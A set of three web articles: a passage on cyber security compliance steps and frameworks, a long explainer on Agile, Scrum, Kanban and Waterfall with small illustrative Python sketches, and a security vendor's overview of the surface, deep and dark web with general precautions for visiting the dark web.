PHI refers to any information in a medical record or designated for use in the healthcare process that can be used to identify an individual and that was created, used, or disclosed in the course of providing a healthcare service. PHI might include demographic data, medical histories, test results, insurance information, and other data collected by a healthcare provider.
Financial Information
Financial information refers to data surrounding an individual’s or organisation’s finances, such as credit card numbers, CVVs, bank account information, and credit ratings.
Other Sensitive Data
Any sensitive information that is confidential, such as an email address, IP address, a person’s race or religion, and marital status.
How to Get Started with Cyber Security Compliance
Common cyber security frameworks, such as ISO 27001 and the NIST Cybersecurity Framework, include processes for assessing and bolstering your current information security posture. With them in mind, here are some steps organisations can take to begin their compliance journey.
1. Identify their data type and subsequent requirements
Organisations first need to understand which type of data they’re processing and storing and whether or not any legal regulations exist to protect such data.
2. Build a compliance team
When implementing a robust compliance program, it is essential to have a compliance team in place, with departments across the organisation contributing.
3. Perform risk and vulnerability analysis
This step is integral to complying with virtually every significant cyber security compliance requirement. It is crucial for identifying security issues within an organisation, as well as the security controls already in place.
4. Develop controls to mitigate risks
The next step is to develop the necessary controls to eliminate existing security risks and mitigate damage during future threat events. Controls include policies and processes for preventing, detecting, and eliminating threats.
5. Monitor and respond to threats
Finally, organisations must continuously monitor their compliance program to ensure it keeps pace with developing rules and regulations. Continuous monitoring also supports ongoing threat mitigation, as policies and procedures are updated to meet an evolving threat landscape.
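As a loose illustration of steps 3 and 4 above, a risk register can be as simple as the structure below. The likelihood-times-impact scoring scale is an illustrative assumption, not a requirement of any particular framework.

```python
from dataclasses import dataclass

@dataclass
class Risk:
    asset: str       # e.g. "customer PII database"
    threat: str      # e.g. "SQL injection"
    likelihood: int  # 1 (rare) .. 5 (almost certain) -- assumed scale
    impact: int      # 1 (minor) .. 5 (severe)        -- assumed scale
    control: str     # mitigating control to implement

    @property
    def score(self) -> int:
        # Simple likelihood x impact scoring, assumed for illustration
        return self.likelihood * self.impact

risks = [
    Risk("customer PII database", "SQL injection", 4, 5, "parameterised queries, WAF"),
    Risk("staff laptops", "device theft", 3, 3, "full-disk encryption"),
]

# Prioritise remediation by descending risk score (step 4)
for r in sorted(risks, key=lambda r: r.score, reverse=True):
    print(f"[{r.score:>2}] {r.asset}: {r.threat} -> {r.control}")
```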
Types of Cyber Security Compliance Frameworks
As mentioned, there are a number of industry-specific and agnostic cyber security compliance frameworks. Some of the most notable include:
- Health Insurance Portability and Accountability Act (HIPAA)
- General Data Protection Regulation (GDPR)
- Cybersecurity Maturity Model Certification (CMMC)
Unsure about which compliance framework is right for your organisation? Get in touch with us today to learn more about how you can maintain cyber security compliance. | <urn:uuid:36a80d95-cd18-4ff9-8eb4-b4b69231ff27> | CC-MAIN-2024-38 | https://hicomply.com/cyber-essentials/cyber-security-compliance | 2024-09-19T18:23:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00377.warc.gz | en | 0.926477 | 923 | 3.09375 | 3 |
This article will explore what Agile is: one of the most popular and exciting product development approaches in use today. We will also uncover what the Agile methodology involves, so you can apply the thinking to benefit your own organization.
Agile has transformed how products of many kinds are developed and delivered. The time between releasing new products is now a couple of weeks or even less, whereas previously it was measured in months.
Agile development will bring early delivery of products, encourage a culture of continuous improvement, and provide the ability to support making rapid and flexible changes to meet the needs of your organization.
Although the Agile definition was initially aimed at developing software, sectors outside of IT have asked “what is Agile” and now embrace Agile thinking, for example, by applying the approaches to planning projects and creating new products such as automobiles.
It is now the most commonly used approach globally for developing anything, even extending to the development of new processes, new organizational structures, and new ways of working.
This way of doing things encourages collaboration between product development teams and the customer, delivering products in a flexible and nimble way.
However, it does require an open mind that is receptive to being guided by ideas and concepts instead of rigid frameworks and processes.
If you look up the term in a dictionary, you will find that it is defined as the ability to move quickly and easily, with grace, suppleness, and dexterity.
The opposite is something that is clumsy, inflexible, and slow to operate. That is what characterized the historic practices for software development, which were heavy with documentation and management control.
In contrast, today’s software development methodologies provide early delivery and continuous improvement of Agile software, with the ability to support rapid and flexible changes to the requirements.
Navigating through any Agile software development life cycle requires an understanding of the concepts. These were first set out in the Agile Manifesto.
This was first published in 2001 along with the Twelve Principles. Taken together, these defined what differentiates an Agile methodology.
This new approach for Agile programming provides a way of thinking and a set of values that promotes a fast and nimble way to work, always focusing on meeting user requirements efficiently and effectively.
There is an emphasis on efficient production, collaboration, communication, and rapid development of smaller sets of features under the guidance of an overall plan.
The Agile scrum methodology was one of the earliest Agile software development methodologies. In this approach, a small team, known as a scrum, develops software in short time-boxed iterations.
A scrum is a self-sufficient, self-determining team. In the scrum methodology, there is no manager who directs the team; instead, the team is empowered to develop solutions, ways of working, and resolutions to issues themselves.
This common theme of self-determination is shared across all the different Agile software development methodologies.
Because this concept is based on a set of principles and values, there are many different approaches to development that can legitimately claim to be Agile.
Scrum Agile has been around the longest and is still the most widely adopted example of an Agile process flow, but several other more recent methodologies have been created using the same Agile basics.
For example, Kanban and DevOps are both Agile methodologies that embrace the principles and values set out in the Manifesto and the Twelve Principles, and hence share the same Agile methodology meaning.
To align with the authentic meaning, any methodology must visibly embrace the Agile principles. This is how the Manifesto defines the meaning of Agile:
We are uncovering better ways of developing
software by doing it and helping others do it.
Through this work we have come to value:
Individuals and interactions over processes and tools
Working software over comprehensive documentation
Customer collaboration over contract negotiation
Responding to change over following a plan
That is, while there is value in the items on the right, we value the items on the left more.
Principles of Agile
The definition of Agile is based on the Twelve Principles of Agile Software, published in 2001 to support the Manifesto.
Taken together, these two artifacts provide the guide for all of the individual methodologies that have come to be known as ‘The Agile Movement.’ Together they describe a culture in which change is welcome, and the customer is the focus of the work.
The Twelve Principles Are:
We follow these principles:
- Our highest priority is to satisfy the customer through early and continuous delivery of valuable software.
- Welcome changing requirements, even late in development. Agile processes harness change for the customer’s competitive advantage.
- Deliver working software frequently, from a couple of weeks to a couple of months, with a preference to the shorter timescale.
- Business people and developers must work together daily throughout the project.
- Build projects around motivated individuals. Give them the environment and support they need, and trust them to get the job done.
- The most efficient and effective method of conveying information to and within a development team is face-to-face conversation.
- Working software is the primary measure of progress.
- Agile processes promote sustainable development. The sponsors, developers, and users should be able to maintain a constant pace indefinitely.
- Continuous attention to technical excellence and good design enhances agility.
- Simplicity–the art of maximizing the amount of work not done–is essential.
- The best architectures, requirements, and designs emerge from self-organizing teams.
- At regular intervals, the team reflects on how to become more effective, then tunes and adjusts its behavior accordingly.
These Principles Can Drive the Following Beneficial Behaviors:
- Customer satisfaction through early and continuous software delivery – Customers of Agile methods are happier when they receive working software at regular intervals, rather than waiting extended periods of time between releases.
- Accommodate changing requirements throughout the development process – The ability to avoid delays when a requirement or feature request changes is a key feature.
- Frequent delivery of working software – the team operates in software sprints or iterations that ensure regular delivery of working software.
- Collaboration between the business stakeholders and developers throughout the project – Better decisions are made when the business and technical team are aligned.
- Support, trust, and motivate the people involved – self-determining teams are more likely to be motivated and hence deliver their best work.
- Enable face-to-face interactions – Communication is more successful when development teams are co-located.
- Working software is the primary measure of progress – Delivering functional software to the customer is the ultimate factor that measures progress.
- Agile processes to support a consistent development pace – Teams establish a repeatable and maintainable speed at which they can deliver working software, and they repeat it with each release.
- Attention to technical detail and design enhances agility – The right skills and good design ensures the development can maintain the pace, constantly improve the product, and sustain change.
- Simplicity – Developing just enough to get the job done right now helps maintain interest and understanding.
- Self-organizing teams encourage great architectures, requirements, and designs – Skilled and motivated team members who have decision-making power, take ownership, communicate regularly with other team members, and share ideas that deliver quality products.
- Regular reflections on how to become more effective – Self-improvement, process improvement, advancing skills, and techniques help team members to work more efficiently.
Agile development is one where requirements are discovered, and solutions are developed by self-organizing and cross-functional teams, using collaboration with end-users, adaptive planning, evolutionary development, early delivery, and continual improvement, and where the development cycle encourages flexible responses to change.
If a methodology has any of these aspects missing, then it is not a truly Agile model.
The detail of Agile software development is process-specific, and the specifics of an Agile development methodology can and will vary between organizations.
That is one of the most powerful aspects of Agile development. The process detail for any Agile product development can be tailored to suit the characteristics of the organization, the capability of the development teams, and the software development cycle, while still following the Manifesto principles.
These principles provide a great overview of Agile that is still as valid today as when they were first published nearly 20 years ago.
There are a number of different Agile development practices, each depending on the specific application of the 12 principles. These can have slightly different software development cycles.
For example, a scrum software development cycle will have fixed iterations, whereas these do not exist in a Kanban development process.
However, common to every Agile development methodology is the regular delivery of products in short timescales, produced without excessive documentation.
The features of a scrum software development cycle are:
- The developers are organized into one or more small ‘scrum’ teams
- There is a product owner for each scrum team, who represents the voice of the customer and the product’s stakeholders to the team. They define the requirements as a set of ‘user stories’
- A scrum master acts as a buffer between the teams and any distracting influences, and facilitates the development process
- Work to be done is held as user stories in a product backlog
- The product owner decides on the priorities of the user stories
- The development team take prioritised user stories and carry out all the necessary tasks to deliver working software
- The working software is delivered in a series of incremental sprints
- Sprints have a fixed duration of between 1 and 4 weeks
- The sprint starts with a sprint planning event that agrees the goal for the sprint and which backlog items will be tackled
- A daily scrum is held with all team members to review progress and agree how to address any impediments to delivery
- At the end of each sprint, a sprint review and sprint retrospective shows progress to stakeholders and identifies any lessons and improvements for subsequent sprints
- Only working software is output from the sprints
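As a rough illustration of how the backlog and sprint planning fit together, here is a minimal Python sketch. The story-point capacity model is an assumption for illustration, since Scrum itself does not mandate a particular estimation scheme.

```python
from dataclasses import dataclass

@dataclass
class UserStory:
    text: str      # "As a <user> I would like to be able to ..."
    priority: int  # set by the product owner (1 = highest)
    points: int    # team's estimate of effort (assumed scheme)

def plan_sprint(backlog: list[UserStory], capacity: int) -> list[UserStory]:
    """Sprint planning: take the highest-priority stories that fit the
    team's capacity for one fixed-length sprint."""
    sprint_backlog, used = [], 0
    for story in sorted(backlog, key=lambda s: s.priority):
        if used + story.points <= capacity:
            sprint_backlog.append(story)
            used += story.points
    return sprint_backlog

backlog = [
    UserStory("As a shopper I would like to save items for later", 2, 5),
    UserStory("As a shopper I would like to pay by card", 1, 8),
    UserStory("As an admin I would like a sales report", 3, 13),
]
for story in plan_sprint(backlog, capacity=15):
    print(story.text)
```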
Kanban is a system for workflow and process management that provides visual signals to communicate information to improve efficiency and effectiveness.
Kanban is used in many sectors, including manufacturing, process improvement, software development, project management, program management, and IT Service Management (ITSM).
Kanban is particularly used in Lean systems, as it provides a simple and understandable way to identify waste, especially bottlenecks between the different steps in an end-to-end process.
The principles of Kanban are very much aligned to the principles included in the Manifesto and Twelve Principles:
- Kanban visualizes the workflow so that it is easy to understand
- Kanban encourages acts of leadership at all levels
- Kanban helps to measure and improve collaboration
- Kanban encourages respect for the process, roles & responsibilities
- Kanban helps the team to make the process explicit and easy to understand
The word Kanban is Japanese for ‘signboard.’ In many implementations of Kanban, the term is also used to describe a board that is used as a visual system to display tasks, their status, and their progress towards completion.
This Kanban Board uses different columns and colors to differentiate between different types of task and their status. This is the most commonly used form of Kanban.
This Kanban Board plays a vital role in displaying the workflow of tasks. It helps to achieve the 12 principles by optimizing the flow of tasks between different teams and between different stages.
Kanban Boards are a useful method for defining, managing, and improving services. By displaying work items visually on the Kanban Board, team members can see the state of every piece of work at every development stage and get a common understanding.
Moreover, a team member gets an overview of who is doing what so that they can identify and eliminate problem areas in the product development process.
The Kanban methodology allows work to be prioritized according to the needs of the customers. As work moves from one state to another, extra work can also be added from the backlog to maintain a steady flow of work through the system.
The development team members collaborate with each other to improve the flow of work throughout the project.
Kanban boards are commonly used in conjunction with the Scrum approach to display progress and support discussions at the daily sprint meetings.
However, Kanban as an approach differs from Scrum, as the process is never restricted to a set process or a defined sprint backlog. Kanban is more able than Scrum to maintain flexibility.
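To make the board mechanics concrete, here is a minimal Python sketch of a Kanban board with work-in-progress (WIP) limits; the column names and limits are illustrative assumptions.

```python
class KanbanBoard:
    """Toy Kanban board: columns with WIP limits make bottlenecks visible."""

    def __init__(self, limits: dict[str, int]):
        self.limits = limits                          # column -> WIP limit
        self.columns = {name: [] for name in limits}  # column -> tasks

    def add(self, column: str, task: str) -> bool:
        """Add a task to a column, refusing if the WIP limit is reached."""
        if len(self.columns[column]) >= self.limits[column]:
            print(f"WIP limit hit in '{column}' -- possible bottleneck")
            return False
        self.columns[column].append(task)
        return True

    def move(self, task: str, src: str, dst: str) -> bool:
        """Move a task between columns, respecting the destination's limit."""
        if task in self.columns[src] and self.add(dst, task):
            self.columns[src].remove(task)
            return True
        return False

board = KanbanBoard({"To Do": 10, "In Progress": 3, "Done": 100})
for t in ["login page", "search API", "billing", "reports"]:
    board.add("To Do", t)
board.move("login page", "To Do", "In Progress")
```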
History of Agile
The history of Agile development goes back to the 1990s when new approaches such as Extreme Programming were developed to address frustrations with the long timescales and poor quality of the software development cycle.
Before the advent of Agile development practices and the start of the history of Agile, the final product of many inflexible software development cycles often did not meet the user’s needs.
Thought leaders in the practices wanted to address these issues by defining what Agile is.
In early 2000 a group got together to develop a new approach, which laid the foundation for the Agile development process.
They published a number of articles that referenced new “lightweight” processes for the software development lifecycle.
In February 2001, the history of Agile really started with the publication of the Agile Manifesto for Software Development and the Twelve Principles of Agile Software. These were the foundation for all Agile development models.
This codification of an Agile development methodology provided an alternative to the documentation-driven, cumbersome software development cycles of the time.
The definition was easy to understand, which helped its adoption by the many teams who went on to create their own Agile development processes.
Using an Agile development cycle first took hold in small start-up companies but soon spread wider.
Agile development process thinking has continued to be developed and innovated throughout its history, resulting in a number of different Agile development models.
Each of these Agile development practices focuses on the customer.
Throughout the history of Agile, these practices have promoted new organizational models for the software development cycle.
The concepts in the definition of Agile demonstrated the value of delivering good products to customers by recognizing that people are the most important asset.
History suggests that following the Agile values will continue to fuel interest, adoption, and development of Agile practices.
Future of Agile
The Agile Manifesto principles are just as valid today for the future of Agile as when they were first published nearly 20 years ago.
The pace of today’s technology change, the ever-increasing expectations of business and consumers, and the globalization of supply chains require Agile methodologies for almost every aspect of life, not just Agile software development.
The future of Agile will be just as vibrant and valuable as the history of Agile.
Over recent years new Agile methodology steps have emerged to cope with the required pace of delivery and specific applications such as Agile project management.
These new steps still align with the Agile manifesto principles and hence are still recognizable as being Agile.
Agile Scrum has become less attractive to many organizations, particularly those whose existence depends on making rapid changes to consumer-facing products.
The fixed delivery cycles of Scrum create issues; hence this approach will feature less and less in the future of Agile.
Agile methodologies such as Kanban and Continuous Delivery overcome the limitations of Scrum, and the future of Agile will continue to see Agile methodologies enhanced with new ideas.
We are also likely to see new Agile methodologies in the future of Agile, as organizations discover new ways to interpret the manifesto principles and develop new Agile frameworks.
One expected area of growth in the future is Agile project management. Before the advent of Agile frameworks for Agile project management, project management practices shared the same issues that led to the development of the Agile manifesto principles, with projects overrunning both timescales and budgets.
In the recent history of Agile, Agile project management methodologies emerged and have started to be widely adopted as the project management community recognized the value of Agile management.
As the use of Agile project management increases, it is highly likely in the future of Agile that these Agile frameworks will evolve as organizations learn and innovate.
In the future of Agile, Agile methodology steps for developing software may also change as new technologies emerge, particularly with the continued growth of remote collaboration tools and the use of enterprise software.
There will also be new steps created for when the Agile framework is used outside software. For example, the human resources discipline has started to apply the Agile Manifesto values for activities such as recruitment.
As the future of Agile sees Agile management techniques extended across every part of an organization, the methodology steps will be amended to suit the particular characteristics.
Twenty years ago, at the start of the history, the use of the Agile framework was restricted to very few early adopters.
Today and for the foreseeable future of Agile, Agile methodologies and Agile frameworks are a fundamental tool for many different disciplines and organizations.
Agile Pros and Cons
Whilst the values and principles of Agile can be applied to a very wide variety of circumstances and situations, Agile pros and cons are many, and there will be some organizations where the Agile cons outweigh the pros.
Despite the proven benefits of this flexible methodology, it is not applicable to everyone in every circumstance.
One of the challenges is that it requires everyone to buy into the methodology, not just the software development team.
A commonly seen problem is that management have a deep-seated desire to be in control of everything, which is completely at odds with the principle of self-determining teams.
For Agile to be truly effective, every part of the organization and every individual in it must understand and embrace the principles and values. For some organizations that is too much to ask.
The whole organization needs to change its culture from being authoritative and hierarchical to the open, trusted, empowered culture inherent in Agile thinking.
In theory anyone can make the necessary transition, provided that they have the desire and determination to understand the principles and values and then make the necessary changes to their attitude, behavior and culture.
However, not everybody is built the same. There can be barriers at both individual and organizational levels to embracing what Agile has to offer.
Here are some of the potential barriers to adoption.
- It requires a culture that is open and built on trust, and the giving of feedback, both within and outside the team. This can be a major challenge for some organizations. This is particularly the case for those with an entrenched hierarchical management structure, where management always direct and routinely check the work of their subordinates, and are not used to getting feedback.
- It needs a change in mindset so that you only work on one thing at a time, and deliver that one thing. Only then can you move on to the next work item. Teams are given just enough work that they can complete a single iteration. This powerful concept helps to avoid teams becoming overloaded. This can be a challenge to organizations that expect every project to show some progress every period.
- It promotes different organizational structures. If you want to increase the rate of delivery from your team, you can’t just add more individuals to it. One of the developments in the organization of software development teams has been the introduction of the ‘two pizza’ concept. This is where the team should be small enough to be fed by two pizzas at one sitting. This concept results in a team size of 5-7 people, which coincidentally is a very similar size to the smallest organizational unit in armies for over a thousand years! A downside of this approach is that if you want to get more throughput you have to stand up a new team. Hence it may not be the best option for organizations where the required rate of production changes.
- It expects teams to be self-sufficient and self-determining. Hence adoption of the methodology typically results in the loss of traditional management roles. The organization needs to be prepared for this, and either redeploy managers who are no longer needed or let them go.
Before you start adoption, it is important that you consider the Agile pros and cons. These can vary depending on which particular approach you look at, for example, Agile vs Waterfall vs Scrum.
To understand the difference between Agile and Waterfall it can be helpful to build an Agile vs waterfall comparison table.
Some key differences concerning Waterfall vs Agile are:
- Waterfall is a strictly formalized and linear approach to software development, whereas Agile pros include its flexibility.
- Waterfall starts with the development of a hierarchy of fixed requirements, unlike Agile, where the requirements are encouraged to change over time. This is an important difference of Agile vs waterfall methodology and a key element of Agile pros and cons.
- Waterfall defines user requirements in considerable detail, whereas Agile captures them as simple ‘user stories,’ in the form of ‘I would like to be able to ….’. This is an important differentiator between Agile vs Waterfall, as it is more likely to give users what they want.
- In Waterfall, the detailed design and documentation is done before any coding is attempted; in Agile, coding starts with just the user stories, and the design evolves over time. This is a good example of where Agile pros and cons derive from the same feature: for safety-critical products, the design might have to be detailed upfront.
It isn’t feasible to combine Agile and Waterfall in the same methodology, as they are in such great contrast to each other.
Considering the Waterfall vs Agile methodology, Waterfall is today only appropriate for large scale projects with outsourced coding, where the requirements are not going to change between design and delivery.
In the next section, we will consider this with reference to Agile vs waterfall project management.
The most important thing to consider before you consider implementation is your ability and desire to transform the culture across your whole organization.
Adoption requires open minds that are prepared for change. This aspect of Agile can frighten the types of individuals who expect certainty in everything.
It also requires collaborative team working, where every team member supports their colleagues; there are no ‘bosses,’ and lessons are learned after issues rather than blame being apportioned.
This can be a major change for an organization that has been used to autocratic and hierarchical management, using task-oriented instructions.
Any implementation must, therefore, be supported by an aligned organizational change management (OCM) initiative.
The OCM activities can and should themselves be done in a flexible and incremental way, recognizing that every organization and every individual are different and that there is no single prescribed approach to get to a culture that is suitable for Agile working.
Agile requires customers to work as part of the delivery teams, with frequent and early opportunities to see the work being delivered, so that they are part of the process to make decisions and changes throughout the development project.
These customers need to be prepared for this involvement, as some customers might not have the time or interest necessary for successful delivery.
It also requires all team members’ full dedication to the collaborative culture, working together towards a common goal.
Before starting the transition to these new ways of working, you should consider the capability of your individual team members to work in this way.
There is a risk that some might not want to work in these new ways, as they are more comfortable with fixed approaches.
You will need to work out what to do with these individuals. Education and training in the new concepts is one approach, but if that fails, you may need to redeploy staff.
You will need to review the different approaches and methodologies available and decide which is best for you.
This selection should be made carefully; otherwise, your investment may be wasted if you make an inappropriate choice.
Hence you need to budget for and plan for up-front education of key individuals on the wide variety of lean approaches.
Whilst you may get some help from external consultants, selecting the best approach requires knowledge of your organization, products, values, and existing culture, as well as knowledge of what is Agile.
When making the selection of the most appropriate approach, you must look beyond the jargon and product marketing.
New transformational approaches like this do not come in a shrink-wrapped box, with regular updates.
Agile is a concept that can be of immense value to your organization, but the transformation will require a lot of dedication and hard work.
You should view your implementation as a new adventure. You are likely to have challenges in the initial stages, which you may need help with to fix, but ultimately moving to Agile can only be done by your own staff.
This will require open minds, flexibility, and above all, a focus on the customer. Trying to stick to a fixed timetable for implementation is likely to lead to failure.
Have someone in your organization who is an evangelist for Agile. They should be prepared to lead the transformation, but be a good listener too.
Following the Agile principle of asking for feedback, and acting on it, is fundamental to a successful implementation.
What is Agile Management
Agile management in action varies in detail depending on which Agile methodology is being used.
For example, in Agile scrum project management, the project manager has management responsibilities, just the same as in waterfall project management.
In scrum project management, the scrum master has no role to play in managing the project. The scrum master role in the Scrum framework is to protect the team from outside influence and to act as a facilitator but not a manager for the scrum process.
Agile project management tools sometimes have challenges encapsulating Agile management for projects, especially as, in scrum project management, all team members have a role to play in managing the project.
This creates challenges in any Agile project management tools that expect roles to be restricted to single individuals, which is contrary to Agile management theory.
What is Agile Project Management
The Agile project management process applies Agile principles to the discipline of project management.
In an Agile project management methodology, projects are delivered using short sprints.
This Agile approach to project management encourages projects to proceed at pace, as it provides a short time focus on the next deliverable.
This avoids the situation with non-Agile management practices where there are often long timescales between the start of a project stage and the delivery of its products.
Also, in a non-Agile project methodology, the deliverables have to be determined in detail at the start of the project, which makes them inflexible to change.
By using the Agile methodology project management can avoid this issue, as the deliverables are defined at the start of each short sprint.
Hence the Agile methodology in project management is more likely to deliver what the user wants.
What the Agile management processes are will differ for each Agile project methodology, depending on factors such as the required level of project governance, the type of products being delivered, and the fit of the 12 principles to the specific situation.
A good way to understand what is Agile project management is to contrast it with how project management used to be done.
PRINCE2 is one of the world’s most widely-recognized project management methodologies.
Before the advent of the new approaches, it was one of the world’s most widely used approaches for managing projects, using a waterfall approach that delivered all the products at the end of the final stage.
PRINCE2 and other similar waterfall project management methodologies use a predictive and plan-based approach, requiring detailed planning upfront to determine the required products and delivery timescales.
In contrast, an Agile process for project management brings many short-term, incremental achievements without the need for an up-front detailed definition.
This adaptive approach is a key feature of any Agile management style for managing projects.
This means that whilst a non-Agile project management methodology such as PRINCE2 essentially steers the customer to remain focused on the project’s original business goals, Agile project management processes are very responsive to changes in the project environment and customer requirements.
Today, Agile project management with Scrum is the most commonly used application of the Agile project management principles and is supported by a number of Agile project management software tools.
As Agile project management becomes more widely used, it is probable that it will have the same experiences as other applications of the 12 principles, with modifications and enhancements of the project management process being made to get away from the fixed-time sprint limitations of using Scrum.
What Is a Waterfall Approach?
The Waterfall approach is much older than Agile and has been traditionally used for large scale software developments for many years.
They have contrasting cultures, so cannot be used together. Waterfall is a strictly formalized and linear approach to software development.
Waterfall starts with the development of a hierarchy of fixed requirements; change after development is discouraged.
The highest level of requirements in Waterfall is user requirements, which are described in a great deal of detail in a formalized manner, not as simple ‘user stories,’ in the form of ‘I would like to be able to ….’.
Each successive level of requirements in Waterfall then goes into more and more design detail; the purpose is to define a design for every specialist group involved in each stage of the development and testing.
These include usability designs, technical designs, user acceptance test definitions, test plans, and program specifications.
The design does not evolve over time in Waterfall, it is fixed at the end of the design stage.
All succeeding stages in Waterfall use this design as the baseline for their activities, presuming that the design is still valid. This is often not the case.
This is a typical sequence of events in a waterfall approach to product development:
- Gather requirements for the complete product.
- Document requirements.
- Sign off requirements.
- Complete designs.
- Sign off designs.
- Code and unit test against requirements.
- Perform system testing against requirements.
- Perform integration testing.
- Perform usability testing.
- Perform user acceptance testing (UAT) against requirements.
- Prioritize any defects discovered.
- Fix any high-priority issues.
- Create release documentation, including a description of the outstanding defects and any functionality that hasn’t been delivered.
- Deliver the finished product.
In a true waterfall development project, each of these represents a distinct stage of software development, and each stage has to complete and be signed off before the next one can begin.
There is also typically a stage gate between each; for example, requirements must be reviewed and approved by the customer before design can begin.
In contrast, the sequence of events in Agile can be summarized like this:
- Gather requirements as succinct, discrete user stories, and store in the product backlog.
- Select enough items from the product backlog that can be completed in one increment.
- Code and test in parallel.
- Deliver the product increment.
- Go back to step 2.
One of the greatest challenges with Waterfall is that it is difficult to capture a complete and comprehensive set of requirements and detailed designs.
Frequently, users don’t really know what they want until they can see it. Customers are not always able to visualize an application from a requirements document.
This often means that customers are dissatisfied with products delivered using a waterfall approach.
Agile methodologies have transformed how work is done today in a wide range of sectors and industries.
Organizations all over the globe have seen the benefits from valuing individuals and interactions over processes and tools, working products over comprehensive documentation, customer collaboration over contract negotiation, and responding to change over following a plan.
The great ideas that were initially confined to software development have now been taken up by areas that were unthinkable back at the inception in 2001.
Time has taken the application of the principles set out in the Manifesto from niche specialists to workers at all levels.
Which particular methodology is best for you and your organization is dependent on your own circumstances and needs, but you can be assured that there is something that will work for you and your customers, both for now and for the foreseeable future. | <urn:uuid:b938fa2d-b715-4cc1-b96a-1a1a73fde82b> | CC-MAIN-2024-38 | https://itchronicles.com/agile/what-is-agile/ | 2024-09-19T18:30:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00377.warc.gz | en | 0.948893 | 6,853 | 3.015625 | 3 |
The internet is almost unfathomably large, and most of us are only actively engaging with about 4-5% of it. This is known as the surface web. The other 95-96% of the internet is split between what is called the “deep web” and the “dark web.” This article will teach you the difference between the surface web, deep web, and dark web, and how to access the dark web safely.
When accessing the dark web, safety needs to be a top priority. There are a lot of dangers lurking in the corners of the dark web, as it’s a well-trafficked playground for cybercriminals and is riddled with criminal markets that span the imagination.
To say the least, DOT Security does not recommend going to the dark web unless absolutely necessary. However, if you’re going to venture into the dark web, you’ll need to be well-prepared, so keep reading to keep safe.
Cybercrime is getting more sophisticated, putting businesses at a serious disadvantage when it comes to protecting their networks. Discover how your current security strategies compare to industry best practices with DOT Security’s Cybersecurity Checklist: How Covered Is Your Business?
The internet has three layers. The surface web, the deep web, and the dark web. The surface web is what the average daily internet user interacts with the most. Search engine results from Google, Bing, and Yahoo, public websites, social media, and anything else that’s indexed and publicly available is considered a part of the surface web.
Although the surface web only comprises about 4-5% of the entire internet, scope is important to keep in mind because this is still impressively expansive. Take YouTube for instance; it would take over 17,800 years to watch every single YouTube video in existence, and that’s just YouTube. That’s just a fraction of the surface web.
While there are some threats on the surface web, and users need to browse with some level of security awareness, it’s a lot easier to stay safe on the surface web than the dark web.
The deep web is in between the surface web and the dark web, and it constitutes the large majority of the actual internet. The deep web makes up approximately 90-91% of the internet. Similar to the surface web, users don’t need any special software to access the deep web, and it’s a relatively quiet landscape in terms of cyberthreats.
The difference between the surface web and the deep web is that pages, websites, and content on the deep web are only accessible to authorized users with the appropriate credentials. In other words, these are pages that aren’t indexed and therefore can’t be found by a typical search engine.
Think about your email threads, for instance. It would be problematic if someone could open your private email chains through a simple Google search. An easy way to think about this is if you need a username and password to access it, it’s a part of the deep web.
Other examples of deep web content are academic journals, government resources, medical records, bank statements, subscription information, private social media content (like private messages), and other content that is accessible only to authorized users who provide the proper credentials.
The surface web and the deep web make up between 94-95% of the entire internet. The last 5-6%, however, constitutes the dark web. Originally used by the United States Department of Defense for anonymous communication, the dark web is now a place for those wishing to stay anonymous themselves.
While there is a lot of criminal activity on the dark web, there’s nothing actually illegal about accessing the dark web. In certain countries, the dark web facilitates political discourse and conversation that would otherwise be censored, outlawed, or eradicated in entirety.
That being said, the anonymity offered by the dark web is the perfect breeding ground for criminals from all walks of life and users are advised to browse with extreme caution. Again, it’s DOT Security’s advice to stay off the dark web entirely.
As mentioned throughout, DOT Security advises against accessing the dark web as it opens up a myriad of vulnerabilities that are unnecessary for the vast majority of businesses and organizations.
However, there are a handful of exceptions to this rule. For instance, there are some organizations who employ the services of white-hat hackers for a number of reasons. Often, these ethical hackers use their computer savvy to help government agencies and big corporations hunt down vulnerabilities and, in turn, create patches and defenses for those system weaknesses.
This process, though, can often involve accessing the dark web for research into the most current malware on the market.
Additionally, there are non-profit organizations like the Global Emancipation Network (GEN) who employ world-class tech-professionals who are using their skills to combat human-trafficking on a global scale. These efforts could very well include accessing the dark web to help victims and hunt down criminals.
Accessing the dark web requires more than just a standard web browser. Before downloading your dark web browser, though, there are a series of safety precautions you’re going to want to take first.
The steps to access the dark web safely are as follows:
- Define your purpose and goal
- Choose and deploy a VPN
- Close all other applications
- Choose an overlay network
- Conduct an IP leak check
- Find dark web links
Let’s break each of these down a little bit further.
The first rule for accessing the dark web is to go into it with a purpose or a defined goal. This will help you navigate the dark web safely while staying out of markets you don’t want to come across or engage with.
The dark web is full of malicious actors, cybercriminals, and other people who are looking to prey on curious but unprepared dark web browsers. By defining your goal and purpose, you won’t find yourself wandering down the dimly lit corners of the dark web, and you can stay on the path you set out for yourself.
Now when it comes to the technical safety precautions that users should take when accessing the dark web, choosing and deploying a VPN is a critical first step.
VPN stands for virtual private network, and it acts as a security bubble for communications from your device. A VPN automatically encrypts your data as soon as it leaves your device through the VPN server. This means your private information, location, and any communications you send are hidden and protected.
Because VPNs offer users anonymity and mask their actual location, they’re also effective tools for accessing geo-locked services.
There are both free and paid VPN services, but if you’re planning on accessing the dark web, you’re going to want to opt for a high-quality paid VPN that offers you plenty of protection.
Once you’ve chosen a VPN provider and have successfully set up your account, you’re ready to start looking at overlay networks.
Before you go much further, it’s important that you close out of other applications and software that offer malicious users on the dark web an entry point into your device or network. When closing down other applications it’s important to actually right-click and quit rather than just hitting the x in the corner of the window.
This is an extra precaution that can protect your device from savvy hackers looking for any opening that presents itself.
With your VPN up and running and all of your other apps closed down, you’re finally on the brink of actually accessing the dark web. To access the surface web or the deep web, all you need is a standard internet browser like Google Chrome or Safari. For the dark web, though, you need an entirely different entry point known as an overlay network.
There are a huge number of overlay networks to choose from, but some of the most popular include Tor, Freenet, and Riffle. You’ll need an overlay network to facilitate your dark web access. You can also increase the level of safety in the overlay network’s own settings, which in turn disables certain website functionality.
Securing a VPN and choosing your overlay network has you in the final stretch for accessing the dark web safely. The final step before you can start browsing with relative peace of mind is to conduct an IP leak check.
This essentially just makes certain that your VPN is working and that your personal IP address isn’t exposed to malicious actors prowling the dark web. To conduct this check, just turn on your VPN and head over to ipleak.net and dnsleaktest.com to see if the IP address displayed is the one from your VPN.
